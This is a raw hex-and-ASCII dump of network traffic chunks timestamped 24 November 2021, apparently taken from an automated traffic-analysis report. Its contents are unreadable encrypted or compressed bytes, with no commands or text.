                                            2021-11-24 14:40:42 UTC54INData Raw: a3 1f 0e 9b 42 fb 43 e7 42 cf 61 b2 52 8a 42 29 65 12 57 4c ab cb 81 d7 30 42 2b 35 a5 05 7c f5 6f d3 ae c1 19 b9 06 fb 37 50 55 ee 1a 2b 66 43 1b 4a 38 9d 54 21 75 f1 e6 34 a8 62 df ff 9e ca d7 0d cd a3 69 b6 02 b4 87 02 79 03 7a 4b 07 13 8c 25 4b c1 63 af 76 b5 dd e1 22 3a 4b 91 8d 79 d8 8b 1d b0 5b a4 64 d6 ad 70 ec 93 59 b4 50 3a b8 e0 0e 5a c0 43 19 50 c5 fe d3 93 b6 46 e5 19 8b 55 70 f0 54 57 9c f6 79 4e fa 8f 17 6c c9 ab 2d 4f d1 7c ce f3 49 51 8f 2a c5 65 12 1a c6 09 12 5c 4a 35 99 be e4 5b a7 9a 17 d0 3e 09 26 8c 6c 5e 1b bb d0 f0 98 4c 29 22 37 b3 82 8c 0e 64 24 d7 b5 be ac 5f 46 3e bc 6b 7c fb 81 f0 41 26 a0 89 e2 96 9f 05 20 e6 94 02 4f 83 e7 06 27 bc 0e e7 1a 2e 0d a3 c0 e6 2c e7 7a e6 ae c0 b5 90 bd 30 ed cc ce 1c cc 1c f0 95 5a c2 3b aa ee
                                            Data Ascii: BCBaRB)eWL0B+5|o7PU+fCJ8T!u4biyzK%Kcv":Ky[dpYP:ZCPFUpTWyNl-O|IQ*e\J5[>&l^L)"7d$_F>k|A& O'.,z0Z;
                                            2021-11-24 14:40:42 UTC55INData Raw: c7 5d d0 4b a1 4a 55 98 5d b0 4c 1f da 5a 30 46 d2 b4 ab 36 d1 59 1d 53 4a ce 06 69 18 1b b1 f0 5e ea 81 50 bc 1c 5e e4 75 87 c6 85 70 94 31 3d 57 40 d5 99 e0 41 bb 6b e0 30 81 ae 56 55 51 7d fe 07 79 d4 ed f1 3a e9 e7 76 42 18 a4 db 86 df 4d d3 94 3c 77 03 60 bd 20 94 3e 0f 20 69 32 9c 74 82 87 89 8f 53 cd 28 5c 28 ff 07 92 a5 83 e9 d0 1f 89 ee 0a a3 0d 04 26 f7 0d f7 14 f8 8c 87 08 20 28 8e 34 5d 43 ed 17 6f 05 cd 48 52 9b 01 84 2e 12 ae ef 86 11 d7 f8 d0 09 82 1c b1 66 85 42 5a 8a 64 a1 66 d7 0e b1 f2 4d 75 c5 f6 51 24 8c 9f e9 36 66 50 c8 0c 31 b0 c1 7e 77 ed 0e f9 8b 33 a6 b1 13 96 ef 55 ce a1 fa 37 57 78 48 5a 18 a8 c6 5d b7 fb d1 dc 2f c1 cb 90 94 35 79 1c b0 a2 89 27 a7 35 86 11 bc 0c 80 6c af 6f ab 5c c8 f3 5d da ed b0 e0 04 b4 e2 a3 dc ee 88 dd
                                            Data Ascii: ]KJU]LZ0F6YSJi^P^up1=W@Ak0VUQ}y:vBM<w` > i2tS(\(& (4]CoHR.fBZdfMuQ$6fP1~w3U7WxHZ]/5y'5lo\]
                                            2021-11-24 14:40:42 UTC56INData Raw: 83 5f 6e ea f9 8d bb 70 85 a9 38 b2 14 15 a7 e9 85 8c f6 47 ed 93 6b 3d 63 57 3f 47 5a 47 47 b0 cc 81 d7 d1 45 2b 35 df ef 54 b1 64 c2 af c6 93 86 d3 60 1f 5d 79 72 1c 44 90 2c 3d 42 67 b7 0a 03 6f e5 de 42 bd 73 d2 81 13 50 b8 ce e1 86 72 a7 c9 de 40 ee 7a 09 6f 5b 00 30 d9 34 5c 1d ee 23 4f 55 cf f1 33 f9 c7 d6 00 78 d8 8b 13 f0 5b 6d 66 d6 a1 72 ec c8 96 b5 50 3a c4 db 1d 5f a9 8c 08 56 a0 f3 e3 bd ad 46 e7 19 64 57 70 fc 7f 8d 73 0f e9 b4 ee 9e 1b 08 e3 ba 28 21 db 72 df ff 2d 7b a7 26 c0 0a 43 75 ec 01 ce 4b 44 33 5e c2 fb 4b af 81 0f 4e 9e e0 4f 62 82 b1 d4 b9 cb c5 50 b3 d6 39 2d a3 27 25 07 75 27 cd 8e b8 0f a2 b3 1f 60 78 73 d4 9c f0 41 6d 87 9b 91 2e 9f 05 2a bd bc 3a 4f c9 ec d8 25 1a 25 ee 30 38 4c bf c0 e6 2c e7 7a e6 8f c0 b5 96 78 32 ed 0f
                                            Data Ascii: _np8Gk=cW?GZGGE+5Td`]yrD,=BgoBsPr@zo[04\#OU3x[mfrP:_VFdWps(!r-{&CuKD3^KNObP9-'%u'`xsAm.*:O%%08L,zx2
                                            2021-11-24 14:40:42 UTC58INData Raw: 09 c0 0a 7a e0 c3 f6 66 65 31 2d cd 7a d7 23 08 58 55 83 44 72 9b e1 db 76 27 68 e5 f7 a0 25 c5 54 05 69 b5 33 07 43 3a 81 21 f0 58 c8 cf 55 a1 09 5f e0 6d bd 3f a1 8e 93 35 d5 45 4d c2 bf 33 f6 84 6d f2 36 88 99 96 45 43 7b c7 fc 65 f2 15 d8 4b e3 f6 7d 46 c6 be fe 85 fc 5e c7 bc 30 61 1a 98 94 51 9d 4d b3 33 6e 31 be 70 95 95 8f b6 5e d6 26 a4 01 8e 00 84 b0 9f e7 d7 24 b5 ec 1b b7 04 0d f6 f6 21 f1 13 de d7 9b 02 20 28 8e 38 76 41 f6 06 7a 3f 37 44 ac 9c 3c 8b 3e 30 ac ef 8c 61 ef e9 c2 0f 82 07 bf 7c 14 67 74 93 73 ba 79 5c 21 de d0 4f 73 d5 cf 76 0c ac 91 ff 70 70 7b ca 0c 28 a5 c3 65 18 eb 1d e6 8c 13 a8 b8 33 b0 e6 46 d5 ad fe 0c 7d 78 59 42 d9 a4 e6 49 be ce f7 db 38 46 87 9b e7 8e 6a 13 ab a6 b7 00 9c a8 9d c0 d1 43 ab 6b 8f 7c a2 43 84 d4 4f da
                                            Data Ascii: zfe1-z#XUDrv'h%Ti3C:!XU_m?5EM3m6EC{eK}F^0aQM3n1p^&$! (8vAz?7D<>0a|gtsy\!Osvpp{(e3F}xYBI8FjCk|CO
                                            2021-11-24 14:40:42 UTC59INData Raw: 17 45 5f ee f9 70 32 63 39 94 18 7d 5d 3b d5 e6 8d b4 49 09 33 2e a9 00 14 9f 9a eb 45 fc 56 e1 51 a6 88 93 78 2e 4a 7e ca 4c a1 d6 04 ef f3 a8 2a 33 ba c5 4b 88 33 09 b7 d2 8b 80 00 d2 dd 57 7d 78 96 74 6c 2c 3c 60 0b 9a 7f 18 68 e5 c8 cf 7d 71 df 81 05 db de 39 df 79 87 4f 1b 99 33 ee 7a 09 76 80 03 13 ff 24 4b c1 5c 1b 5c 5e d8 eb 0c 17 5d b9 c3 a6 d8 87 21 2a 34 c3 7a d6 ab 61 ea bb b4 b7 50 3c d7 b0 0d 5a c6 3f 09 56 aa fb d2 93 bc 4d ef 76 4d 4e 40 fd 6e 9a 63 09 86 ee ec 9e 0c 1b f8 a9 3b 21 1c 71 df f3 23 35 bc 22 c6 1d 2a 12 c7 03 c4 47 44 0a d3 ad ec 40 87 ed 1f 5e 83 3b 2f 54 92 a1 cf bd f3 c9 a9 58 01 00 20 b4 f7 21 83 63 2e dc 9c 95 a4 4e 44 f6 c0 09 56 fc af 52 50 6f 80 9d ca 5d 9e 05 2a a1 92 16 67 e0 e2 06 21 0b 82 e0 1a 38 0c b0 c8 f7 24
                                            Data Ascii: E_p2c9}];I3.EVQx.J~L*3K3W}xtl,<`h}q9yO3zv$K\\^]!*4zaP<Z?VMvMN@nc;!q#5"*GD@^;/TX !c.NDVRPo]*g!8$
                                            2021-11-24 14:40:42 UTC60INData Raw: 68 ac a3 5c cf c6 da dc f2 bb 2d 09 c0 0a 7a e3 db db d9 57 31 2b ef 79 de 50 b4 70 b0 88 4f a5 6e 7d db 76 3c 7e c9 ad 88 d5 c0 59 0a 69 78 32 07 43 3a 80 23 f0 54 c8 0e 55 a1 05 5f e3 62 bd 4e a1 8e 93 35 1c 44 4d c2 bf 8b f7 84 61 c9 ac 81 b1 74 55 46 6c e9 3d 48 f0 13 f6 00 cb d8 7b 55 c4 a1 28 98 e9 59 e9 ba 2f 65 1c 88 94 22 9d 4d bf 36 97 39 c9 42 96 81 85 43 e6 d2 26 a2 38 d5 28 aa b4 93 f0 c9 24 b5 ee 1b bb 04 0b 98 85 03 f9 05 f6 97 e0 31 2a 00 df 29 7f 56 90 3f 7c 17 d4 56 a4 8b 2b e2 32 15 ac e9 97 06 d6 ef ea 0b 92 0e a8 1b 5d 41 76 95 64 a3 58 0e 22 b1 f0 22 59 d1 de 79 23 9d 9d 90 61 1e 51 c2 d2 7b d0 f0 6e 77 fa 0f ef 97 c4 8f ca 19 87 e0 29 f7 bc f4 22 54 71 48 4f 68 80 3a 5c 9d f7 c9 ca 3d 64 96 91 94 32 05 35 a3 ad 99 29 95 80 d4 1a d3
                                            Data Ascii: h\-zW1+yPpOn}v<~Yix2C:#TU_bN5DMatUFl=H{U(Y/e"M69BC&8($1*)V?|V+2]AvdX""Yy#aQ{nw)"TqHOh:\=d25)
                                            2021-11-24 14:40:42 UTC61INData Raw: e5 3e a3 3e cc fa 03 32 ca c6 30 12 40 4f 95 f5 d1 32 65 22 b1 0e 12 7b 33 c6 e7 8d bd 49 dc 37 2e a5 70 2e b5 73 ec 43 e7 4a 88 9c b0 52 86 89 2a 68 7e 61 4c a1 d6 08 f1 a8 fb 2b 33 ba 1e 7c 89 6e d3 ae 09 ba 80 14 ed e1 45 6c 63 0b 3a 7e a2 8a 77 e0 65 80 ed 75 f2 d9 0e b8 64 c8 96 12 da e9 8c 1f 79 87 6e 06 94 87 d9 7a 03 76 4d 1e 48 72 24 4b c1 79 1d 66 5e de eb fa 2d 5b 93 c0 52 d8 81 4a 1e 34 82 66 d6 ab 61 2f bb b4 b7 8d 3c d7 ca ae 5b c6 45 1d 56 aa e9 c8 93 bc 56 ef 76 4c 55 22 fa 6e 9c e5 08 86 90 35 9f 1d 19 e7 ab 2d 4e e7 70 df f8 2f 5a 8c 2a 33 0a 45 1a 42 03 ce 5c 54 31 49 95 26 4a af 8b 1e 4f 8f 2a a2 73 bf a4 ee f5 e8 cb a9 4c 38 2e 3b bd 0f 37 22 6c 27 cb 4b 8b b3 55 5f e6 be 7c 50 e4 55 f1 6d 6e bc a7 e0 94 99 0e 39 a3 92 02 5e cf fd f8
                                            Data Ascii: >>20@O2e"{3I7.p.sCJR*h~aL+3|nElc:~weudynzvMHr$Kyf^-[RJ4fa/<[EVVvLU"n5-Np/Z*3EB\T1I&JO*sL8.;7"l'KU_|PUmn9^
                                            2021-11-24 14:40:42 UTC63INData Raw: 26 46 db 4b 24 84 58 2a 06 a3 26 57 a9 be 7a 75 23 db dc 64 82 b6 17 df 71 f5 f4 d5 ec 47 74 92 2d c7 57 40 41 b5 47 5f a9 f6 af 46 e1 47 67 31 72 c6 8b 46 25 c3 59 90 50 51 2f 0b 5a 41 f9 33 f7 41 ed 8d 2f 3d 1e 4b fb 6a b5 4c a2 8e 95 81 23 41 52 cb 88 12 6a 95 6c fe 20 97 2d 6f 41 5c 6c f9 89 77 f5 0c e2 00 7f e7 7c 4a dd a1 4a 88 ff 41 d5 82 b1 74 1d 81 a9 1a 01 5c b2 3f 7f 18 69 6e 91 95 15 8f 46 cd 31 b4 b5 c2 07 9b ae 85 6a ce 0b 84 f7 3b 31 12 25 d8 6a 30 fc 1a ea 92 74 31 25 37 93 3d e3 41 f8 08 62 01 4e 56 ab 85 30 ad 96 17 ac ef 1a 1f c0 f4 dc 29 13 0e ae 74 e7 52 71 8c 6a bd ec 5c 21 ae d6 6d 8c d3 de 7f b8 9d 92 e0 57 09 cd d9 0b 31 81 c4 f0 66 fb 03 c5 90 51 b6 9a 04 a3 c6 c6 df be f4 b8 54 7f 46 6d 11 38 29 5b 84 c0 e0 5b 38 4c 94 0c 85 33
                                            Data Ascii: &FK$X*&Wzu#dqGt-W@AG_FGg1rF%YPQ/ZA3A/=KjL#ARjl -oA\lw|JJAt\?inF1j;1%j0t1%7=AbNV0)tRqj\!mW1fQTFm8)[[8L3
                                            2021-11-24 14:40:42 UTC64INData Raw: 6c ec ca d7 ee 1a 7c 27 e2 e8 86 f0 5c 02 32 c4 9f 89 21 d3 d9 5f 23 51 4b f0 f9 8a 36 63 35 d3 b9 7c 5d 3b 64 f0 85 bc 69 86 22 38 b0 0f 3c 69 71 ea 45 e7 56 f6 9b 2b 5f 85 6e f3 4f 56 56 45 ce 6d 1a ff d1 52 38 25 a3 01 6c 00 6c d3 a4 c6 90 80 17 60 24 52 74 63 1e 44 dc 2d 3d 42 2b 9e 0c 73 65 f4 c4 cb ad 73 dc b8 59 ce d7 01 8e 34 79 b0 19 a5 51 ef 6c fd 7d 4f 14 13 93 20 4b cd 1b 87 5f 5e d4 f5 da 2e 4b 47 c8 69 dd a9 57 2e 34 84 09 64 aa 61 e0 af 4a b6 46 c2 d6 aa 1d 5f ee 18 0c 56 ac 86 60 92 bc 5d fb 88 4d 43 8e fb 0e 8d 67 21 d8 94 ec 98 72 ab f3 ab 27 5a 03 71 c9 07 3d 0a d0 13 d2 08 45 1a b5 21 cc 4d 44 31 45 b7 61 5f af 8b 1f 4d 93 27 46 64 bb fa c1 ae f3 7a be 56 3e 00 78 b0 f1 30 ac 75 34 c4 b5 db a8 5f 4a 42 af 77 4f d4 f5 f4 41 61 36 98 f8
                                            Data Ascii: l|'\2!_#QK6c5|];di"8<iqEV+_nOVVEmR8%ll`$RtcD-=B+sesY4yQl}O K_^.KGiW.4daJF_V`]MCg!r'Zq=E!MD1Ea_M'FdzV>x0u4_JBwOAa6
                                            2021-11-24 14:40:42 UTC65INData Raw: 14 e5 67 f6 8a 77 b0 e1 d2 0d 2f fc c9 d4 5f 32 8f 9a 3b 02 b2 b0 4f bf a9 c0 cf 4a df dc fe bb 95 09 c0 0a cb f4 d8 e4 98 47 3b 3c cd 46 c2 61 53 50 db 3e 59 9e 71 f7 c8 7d 3f e3 7a ba a4 ab 74 4e d6 52 49 23 0b 6e 0d 74 26 e1 52 e8 83 5e 3b 27 26 e0 64 93 f1 86 8e 95 17 90 57 46 d3 41 7d fd 95 67 f6 e6 92 bd 6f 4a 52 62 de ce 15 1d 12 f0 1c f0 ff 6a 51 dd 96 c0 8a d8 66 73 91 2d 65 0b bf ad 2c 07 5e a0 31 7c 21 81 77 e2 65 88 9e 4b c1 37 b3 38 c7 28 05 b4 93 f0 c9 81 9c ee 1b b0 06 31 cc de 82 fb 05 fa ac b2 20 22 22 04 14 7f 50 fe 04 6c 06 c0 50 20 a5 2d 8d 17 3f 1c ef 86 04 ef b1 c2 09 99 19 78 f9 50 43 76 92 66 a5 66 5e 2b a7 e5 5e 5b fd dc 7f 22 9f 9a e9 65 0b 22 ea 0e 2e a5 c1 7c 66 ed 08 ce ed c9 a7 9b 02 0a e1 46 df bf e7 06 54 5a 4f 59 09 8c 29
                                            Data Ascii: gw/_2;OJG;<FaSP>Yq}?ztNRI#nt&R^;'&dWFA}goJRbjQfs-e,^1|!weK78(1 ""PlP -?xPCvff^+^["e".|fFTZOY)
                                            2021-11-24 14:40:42 UTC66INData Raw: b5 87 ab 2f e4 d9 dc 0b dd c1 e7 a6 0b c6 2d b2 38 e7 c9 04 68 5f 37 78 73 61 cb 53 df 45 36 f4 80 2c bc 77 73 ae f0 95 65 a5 3a 96 6b 6f 7f 53 a0 43 67 f7 ba e9 31 2e 46 5c f5 f6 4d 35 56 3c 7b 29 80 4a 19 d2 5a 7f 08 ed 7f fa 15 2f f0 9e 1a b0 a6 80 99 5b cc a3 50 c5 4c 4e 56 90 2e 7f d0 d0 41 ef 40 5a c2 4a dc 50 dc d7 75 96 18 49 3e fd 64 21 ff a5 26 63 8c ee d6 75 67 3d 7b 1b ca 95 32 54 db d4 5f 62 6f d3 20 89 04 21 9a 85 85 42 43 66 5f 3e 7d c1 f7 37 63 a6 e8 5d 18 29 05 ce e2 e7 38 a4 89 35 79 2f 85 46 ae a2 4c cf d1 da dc f2 a9 ed f6 3f ff 7e f6 c1 e2 59 47 27 15 42 55 dc 50 a3 57 7d c7 4b af 40 8e c2 77 36 67 e0 ba b1 2a eb 09 08 41 50 5f 1e 44 12 6f 1b 34 5e e0 92 44 b7 10 45 32 77 8d c8 b6 98 a6 4c 23 50 55 12 84 76 dd cd 7a f1 23 a6 a0 59 57
                                            Data Ascii: /-8h_7xsaSE6,wse:koSCg1.F\M5V<{)JZ/[PLNV.A@ZJPuI>d!&cug={2T_bo !BCf_>}7c])85y/FL?~YG'BUPW}K@w6g*AP_Do4^DE2wL#PUvz#YW
                                            2021-11-24 14:40:42 UTC67INData Raw: 2c f4 ed f3 4e da f6 b6 f3 03 46 ef 9b c5 f3 8b 44 2b 3e f2 eb 55 65 c0 4c 8e 16 e6 ca 43 3e 00 e4 8b ef 25 d4 50 82 9b a5 6b 1c ca fc 50 65 71 9f d3 38 5c 4a e7 b2 21 48 4a 08 57 b2 7e 6d ca a4 22 26 fc d1 64 74 77 6c 15 ea b6 53 d6 89 b9 f2 f2 d9 8a 40 90 4b 86 35 3a 97 ff c0 4c 4c f7 eb 2c 7c 4f d9 bf 82 ea b9 80 99 01 2c 44 b2 40 a5 96 67 21 65 66 f7 9e b7 f0 25 55 34 c5 b7 56 32 88 8b a6 4a 8c 15 c4 e0 36 cf 82 c6 18 17 e1 fc be 50 cb 29 57 17 83 0b 83 fa 75 1b fa 86 71 eb f2 a5 ed ff 14 e2 27 50 ed 86 fc 1b 66 32 c4 9f 03 14 ca c0 2b 15 40 45 ed 07 c0 3c 72 3d ad 1b 4c f5 ef c9 c4 b4 87 61 95 39 3d ac 37 3c b7 73 e0 9b f6 41 cd 8b f0 4e 8c 57 3f 4d 56 56 4a a1 dc 1b ef d9 41 2b 25 b2 13 54 be 6e d3 a4 cd 83 91 04 e1 07 55 7d 5e 1a 2b 6c 36 3d 48 29
                                            Data Ascii: ,NFD+>UeLC>%PkPeq8\J!HJW~m"&dtwlS@K5:LL,|O,D@g!ef%U4V2J6P)Wuq'Pf2+@E<r=La9=7<sANW?MVVJA+%TnU}^+l6=H)
                                            2021-11-24 14:40:42 UTC68INData Raw: 29 05 cc e2 e7 2c ed 69 e2 dd e6 b4 96 b7 23 e4 1e c6 0b a3 fc f0 95 50 c6 32 bd 81 de df 2f 2b 51 3f e6 7f 70 ec 43 eb 20 0f 7b ab 2a ad 78 77 26 fe 84 6f ad a7 03 52 6d 68 42 bd de 5c e1 ab e2 9a b1 d3 56 f5 4e 4c 35 56 05 25 37 91 45 27 26 73 6c 03 c5 a1 ea 1c 34 d2 d5 3d b1 ac e5 a0 50 dd a0 2e fa 5a 98 4f 96 36 1e ec 5c 46 e5 4b 5c d2 7a ce f8 7d a9 4e 1b 27 43 2d fb ee 25 d8 b1 04 d9 8b 81 c4 6b 47 bb 48 13 c0 4a 31 59 5e e3 5f 68 49 ef 3a af 3d ae 9d 83 8f 6b 68 45 4e 17 b5 d0 e6 91 5c a6 a9 40 ba 38 26 da ca 4c 38 a4 83 2a 31 a2 ba 46 99 a2 5a e7 36 db dc f8 89 b1 09 c1 1b 59 e3 d2 92 4e 54 31 bd c7 57 cd 23 d3 59 55 83 42 a6 29 14 da 76 3c 7e cb a9 88 43 c2 59 06 52 53 21 01 54 17 73 33 f5 d0 57 fd a3 a0 0f 46 ef 63 82 03 b5 58 18 42 32 46 4c c8
                                            Data Ascii: ),i#P2/+Q?pC {*xw&oRmhB\VNL5V%7E'&sl4=P.ZO6\FK\z}N'C-%kGHJ1Y^_hI:=khEN\@8&L8*1FZ6YNT1W#YUB)v<~CYRS!Ts3WFcXB2FL
                                            2021-11-24 14:40:42 UTC70INData Raw: 32 ef 53 96 1e d9 49 89 44 d8 78 a2 45 ed 9e 4b da fa 8a 68 11 4a e5 fc 2a fe 82 c0 f3 cb 7d 5c 6f a9 e1 bd 3d 01 3a f5 15 b7 3f e2 a3 79 35 d1 41 f8 e9 13 7c cc b6 10 42 68 50 8f ea 40 49 47 f6 40 a9 5d 47 9a 77 34 70 7a 16 43 bf b9 ed d6 1c 5f 65 61 0e ef 8f 3d e3 6b ae df fe 6a 9d 9c af 0a 08 0a 3c e4 02 d2 4a 50 89 13 a3 cb 5d 0b 84 13 fd b7 ad e3 94 2d 55 ba fc 23 91 76 29 82 40 e0 b1 a5 8e de 45 3a de ba 6f bf 18 ab 5f 62 08 11 12 f7 1a 5b 88 52 c4 fa 36 ed af 5c b5 da 47 12 98 0d 3f 6d 75 0a f2 3a 2f 71 f4 b2 c3 69 1e 76 09 c9 10 87 f6 39 dd ce c5 95 21 38 e2 48 25 1f 57 63 73 d5 d3 34 4b a4 bf 09 7b 2e cd c7 e1 96 df 9c 94 33 24 b5 17 6b 49 72 ea 4f e1 9d f4 99 a2 56 b4 70 3e 4d 56 28 b3 a0 dc 11 f7 ca 45 44 33 b2 13 5e ca 6f d1 a4 dd ec 21 04 fa
                                            Data Ascii: 2SIDxEKhJ*}\o=:?y5A|BhP@IG@]Gw4pzC_ea=kj<JP]-U#v)@E:o_b[R6\G?mu:/qiv9!8H%Wcs4K{.3$kIrOVp>MV(ED3^o!
                                            2021-11-24 14:40:42 UTC71INData Raw: 6a fd b0 cf cc 06 27 1d 1f e7 1a 38 0d 96 c1 28 2f e5 76 fc ae c0 b4 85 8d 36 ed 20 cd 1c cc 43 f1 95 4b c1 28 a2 d6 e1 dc 2f 21 4e 36 63 4b 7d 12 43 d4 26 0f 7b ab 2a ad 78 77 27 e8 9b 76 ac 29 a5 72 5a 97 43 9b cc 40 e4 b2 e8 82 37 7c b6 dc 71 46 2b d1 3f 21 29 81 53 36 21 48 77 02 d4 a3 e6 eb 24 f4 b3 0b b7 b6 f0 92 c5 d2 b6 49 d2 4a 90 5a 8d c1 70 eb 54 57 e8 5d 46 4d 73 c6 65 c2 c6 73 12 38 5d c0 fd ea 3b d1 a6 61 e2 8d ee d6 75 52 a2 4c 1b db 9c 3b 73 88 d5 73 30 52 f8 20 81 1a bd 9b 14 92 1c 4d 27 47 0c 6d 41 f8 e4 47 c4 88 55 ab 3e b7 c0 95 55 5a c4 8a 3b 00 32 a4 19 b9 c1 3a ee 32 dd 4d e7 83 ee 1e a3 60 60 f4 d4 62 51 74 6e 34 a4 37 d5 41 b4 c9 4a c9 10 b4 25 81 d2 67 30 fc ed 2b a0 25 c3 06 11 22 36 84 9b 5a 02 76 2a f0 4f e8 8d 45 5f 0e 60 ee
                                            Data Ascii: j'8(/v6 CK(/!N6cK}C&{*xw'v)rZC@7|qF+?!)S6!Hw$IJZpTW]FMses8];auRL;ss0R M'GmAGU>UZ;2:2M``bQtn47AJ%g0+%"6Zv*OE_`
                                            2021-11-24 14:40:42 UTC72INData Raw: 3e 61 93 96 99 e9 17 12 a1 ad 89 29 98 c7 1f 1f d3 43 96 b6 b6 73 b1 46 fd ac 4e da fc b3 fb 03 4f f5 e0 5f fe 82 cc 8f 30 54 1b 64 a1 c3 d3 3d 10 39 ca fa 3a 3e e4 8d 81 ae d1 47 81 06 15 74 ee c7 ee 43 6e 4b 81 ea 1a 4d 47 fa 40 07 59 47 96 66 5f 73 7a 10 21 44 90 ea dc 73 89 77 69 15 ef 9e ae e7 6b a8 e6 74 7a b5 02 83 9d 0d 1c b7 90 fe d3 4b 4e f2 fa 8a 68 57 03 a6 84 d1 6d a8 cb 16 3f d8 bb d4 b4 93 62 3b e5 94 42 b1 af eb 0b d8 3a d4 b8 56 38 34 a5 58 4a 8a 06 1b e0 3a ca a4 ca c6 89 cc fa 22 51 da 27 47 06 86 11 3f 48 71 0a fe 06 83 af f7 b4 ed f8 97 71 0f ba ed 92 e2 27 9a 90 c4 95 21 18 56 c0 21 15 42 40 eb d9 c7 1a fb 37 bc 0f 6b d0 36 c6 e1 9d a4 75 81 1b 8d a3 1f 0e a3 5b 3c 46 f6 41 f1 06 b6 52 8c 56 2b 59 42 7e ef a1 dc 11 d7 47 41 2b 39 98
                                            Data Ascii: >a)CsFNO_0Td=9:>GtCnKMG@YGf_sz!DswiktzKNhWm?b;B:V84XJ:"Q'G?Hqq'!V!B@7k6u[<FARV+YB~GA+9
                                            2021-11-24 14:40:42 UTC74INData Raw: fe 5e 73 8b eb 7e 85 91 1a 35 af ac 9e 5e c7 f9 10 07 c9 0f e7 1a a4 1c ad df f1 0c 1c 7a e6 ae 5c a4 98 a2 28 cd d4 cf 1c cc 49 e0 9b 45 ce 24 ce 72 e5 d0 30 3b 6e 81 6b 54 70 70 53 f6 35 0a e9 cb b6 bc 77 7b 3f d7 46 65 a4 29 28 6b 43 76 5f a8 95 c4 e6 b4 f7 8d 24 f8 59 d3 42 52 2a 0f 88 30 27 8d 5f 21 b5 70 7f 02 c4 b8 f5 04 2b ce 9a 82 b0 ac ef 2d 48 c2 b2 5e dd c7 89 4b 9f 20 19 5b 4c 48 f6 60 95 d1 6c cd ea db c8 78 05 50 d5 2f f2 dd 2f 9a 2d 1f c6 90 f1 90 f6 56 bf 59 04 8d 08 35 72 68 f4 a6 68 43 fc ad 96 1d b3 94 a5 6c 43 50 45 d2 0c 65 cf ea a4 52 3a f9 52 a5 33 06 58 ca 4c 38 38 92 24 19 af 9a b2 ae a3 5a 7b 32 d5 c3 f5 8c da 95 d1 0e 76 eb cd bf d2 45 3f 32 c8 77 37 50 b2 58 c9 98 41 bc 43 e6 a8 fb 37 6d cb b8 a4 fb d7 7c 24 76 56 30 0d 56 14
                                            Data Ascii: ^s~5^z\(IE$r0;nkTppS5w{?Fe)(kCv_$YBR*0'_!p+-H^K [LH`lxP//-VY5rhhClCPEeR:R3XL88$Z{2vE?2w7PXAC7m|$vV0V
                                            2021-11-24 14:40:42 UTC75INData Raw: 71 4f b6 06 88 3a 4b 96 e6 c9 c7 c6 4d b8 92 bf 36 41 90 a6 87 9f 38 87 98 9e 1e 22 44 81 6c 05 7c a2 52 b6 5a 4f da f6 a9 e0 0e 62 58 8f d6 f5 88 cc b4 97 78 5c 63 89 77 c2 39 0b 4f cb 97 b3 35 e9 82 81 21 d3 47 81 38 1e 54 64 dd ed 45 40 42 85 c2 37 4a 6d f9 40 8b 5d 47 9a 30 ba 71 7a 1a 23 4f ae fe d7 4b 3e 65 61 04 f6 ab 53 ec f1 bb f3 6d 6a f2 80 85 9d 01 19 34 81 ed de 72 29 e7 ee a2 da 59 12 a1 0a ea b1 ba cd 7f a5 54 bc de 9c 36 72 2f f7 94 5f b1 af eb 30 41 2b d1 9a 76 3c 1c a1 60 0d 8d 15 12 82 e5 df 8c 58 d1 8e db eb bb 7e a6 25 46 14 85 88 10 eb 71 0b e7 1d ba 7a e2 a5 ee 4c 0b 79 1c aa fd 96 e2 27 a5 be eb 95 2b 31 d9 d1 30 0e 47 5c 66 c0 c2 25 4b 94 bc 09 77 7b 20 d7 f7 0c 9c 7e 84 23 38 39 37 15 b7 73 e0 95 e3 47 e7 8a 99 46 8c 57 35 65 62
                                            Data Ascii: qO:KM6A8"Dl|RZObXx\cw9O5!G8TdE@B7Jm@]G0qz#OK>eaSmj4r)YT6r/_0A+v<`X~%FqzLy'+10G\f%Kw{ ~#897sGFW5eb
                                            2021-11-24 14:40:42 UTC76INData Raw: 9d 86 ac 7f 4c e0 af 45 c1 fc ab fa 43 73 82 a1 70 95 9f 0f 4f a8 95 02 45 c3 38 0a 0f 2b 0f e7 10 10 35 a3 c0 ec f2 e7 7c cc ae c1 a5 96 bd 30 ed 0f cf 09 d9 d5 fd 8f 5a d7 3a b4 ec dc c2 2d 21 44 0d 78 64 73 ec f3 fa 2a 11 55 80 2a bc 6f 69 1b 54 97 65 a4 29 bd 65 47 97 43 9b da 5c df 8d ed 93 39 72 60 f3 5d 4d 3f 4a 54 d5 28 80 40 2e 33 56 7f 0b da b7 05 14 09 cd be 32 8c a9 ef b7 4f e4 8b 41 d2 51 8e 05 f6 3d 71 c7 42 5b e2 40 52 ce 63 33 77 e6 ce 5a 7b 25 49 3e e3 d6 3d d9 b8 11 c1 72 ef f0 73 97 ed 44 1b cb bc 30 7c 76 de 30 75 41 fc 3b 83 7c b2 9f 85 8f 4f 4f 4f 43 1d 62 cf fb 45 5d 8a e0 64 8a 3a 26 da d5 50 35 a4 8a 33 f8 a2 96 48 ad d0 52 e5 23 d1 b3 f1 91 b1 03 cb 1a 64 e5 db ec 5e aa 30 01 d2 53 f4 69 b7 58 53 9f 67 81 46 e1 d1 60 76 2a cc ab
                                            Data Ascii: LECspOE8+5|0Z:-!Dxds*U*oiTe)eGC\9r`]M?JT(@.3V2OAQ=qB[@Rc3wZ{%I>=rsD0|v0uA;|OOOCbE]d:&P53HR#d^0SiXSgF`v*
                                            2021-11-24 14:40:42 UTC77INData Raw: a7 9d 1b 81 e6 46 ce a8 ff 0f 5e 78 5e 5f f9 a5 14 5e 83 ed c0 dc 2e b2 95 bc 96 23 61 13 a6 b5 61 39 b0 aa bc 1c f8 a6 83 17 cc 7c a2 47 ef c2 4d d9 81 cb ff 12 4e c9 8f d6 ff 91 fa 9e 36 54 5c 65 a1 cf c2 39 10 2a d6 be a8 3f e3 9c 10 37 fd 45 93 1e 12 7b d0 27 ec 6f 6a 4d 8c c2 3a 55 b9 f1 44 2a 72 45 b7 bc a1 08 10 10 30 47 92 cf de 70 df 0e 61 04 e3 8d 42 e7 6b bb c7 7e 6e b5 9a 87 9d 0d 0a 3a 86 e8 d8 61 41 e6 e9 b5 35 56 2f ae 88 f2 b7 ac dd ee 28 79 be c3 bf 92 71 37 0f bd cd b3 84 e3 08 a7 38 af d9 47 3c 18 81 7b 48 8f 68 79 f1 32 da a6 52 c2 89 d9 dc ad 56 f2 27 46 12 37 05 17 fa 67 01 df 09 ab 72 e3 4a ea c2 18 6e 04 ba eb 90 08 32 9e 31 d3 9e 2b 37 d2 3e 20 33 53 60 f8 fa 30 